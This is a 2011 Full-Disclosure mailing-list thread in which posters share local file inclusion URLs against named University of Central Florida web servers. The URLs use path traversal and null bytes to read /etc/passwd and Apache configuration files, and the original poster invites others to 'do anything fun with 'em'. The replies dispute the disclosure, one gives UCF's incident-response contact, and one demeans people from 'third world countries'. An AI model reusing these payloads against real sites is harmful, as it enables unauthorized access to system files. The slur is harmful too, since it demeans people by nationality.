Date: Sat, 19 Feb 2011 12:07:18 -0500
From: Eyeballing Weev <eyeballing.weev@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: University of Central Florida Multiple LFI

Might as well register a new email account too because "hacktalkblog" is 
just as obvious as posting a link to your site. I hope UCF calls FDLE 
and you can explain to Special Agent Veazy and others about your "research"

On 02/19/2011 12:04 PM, Hack Talk wrote:
> I actually live close to the University of Central Florida and after
> countless attempts to contact both their infosec team, the "tech
> rangers", and their personal web developers with no contact back or
> patching of these vulnerabilities I decided to post these up on FD.
> There are still many, _many_ more vulnerabilities which I have yet to
> disclose as I'm still giving them a chance to patch them.
>
> Also, I usually remove my website from the email as it's part of my
> standard email signature, guess I just couldn't be bothered to do it
> when I sent in this vulnerability. I'll be sure to be better about
> removing it so people aren't so butthurt.
>
>
> Luis Santana
>
>
>
> On Sat, Feb 19, 2011 at 11:48 AM, Eyeballing Weev
> <eyeballing.weev@...il.com> wrote:
>
>     Madhur Ahuja and "Hack Talk" are obviously from third world countries
>     and are only doing this for publicity, much like how Turks and Romanians
>     "hack" into websites for defacement purposes. Same concept just applied
>     differently.
>
>     On 02/19/2011 11:45 AM, Shawn Merdinger wrote:
>      > Hi,
>      >
>      > At the risk of being ridiculed here, I'll point out that UCF does have
>      > an Infosec office and an incident response POC.
>      >
>      > https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx
>      > sirt@...l.ucf.edu
>      >
>      > fwiw, security folks in .edus are at the low-end of this industry's
>      > pay-scale and it's difficult to find/retain qualified people, not to
>      > mention adequate budget for purchasing (even more) crappy security
>      > products and almost no budget for professional development like
>      > training and conferences.
>      >
>      > I would expect there are more challenging targets out there, were one
>      > inclined...
>      >
>      > Cheers,
>      > --scm
>      >
>      >
>      > On Sat, Feb 19, 2011 at 06:04, Madhur Ahuja <ahuja.madhur@...il.com> wrote:
>      >>
>      >> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>      >>
>      >> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk <hacktalkblog@...il.com> wrote:
>      >>>
>      >>> Found these and thought I'd share:
>      >>>
>      >>> -==================-
>      >>>
>      >>>
>      >>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>      >>>
>      >>>
>      >>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>      >>> -==================-
>      >>> Let me know if you do anything fun with 'em
>      >>>
>      >>> Luis Santana - Security+
>      >>> Administrator - http://hacktalk.net
>      >>> HackTalk Security - Security From The Underground
>      >>>
>      >
>      > _______________________________________________
>      > Full-Disclosure - We believe in it.
>      > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>      > Hosted and sponsored by Secunia - http://secunia.com/
>
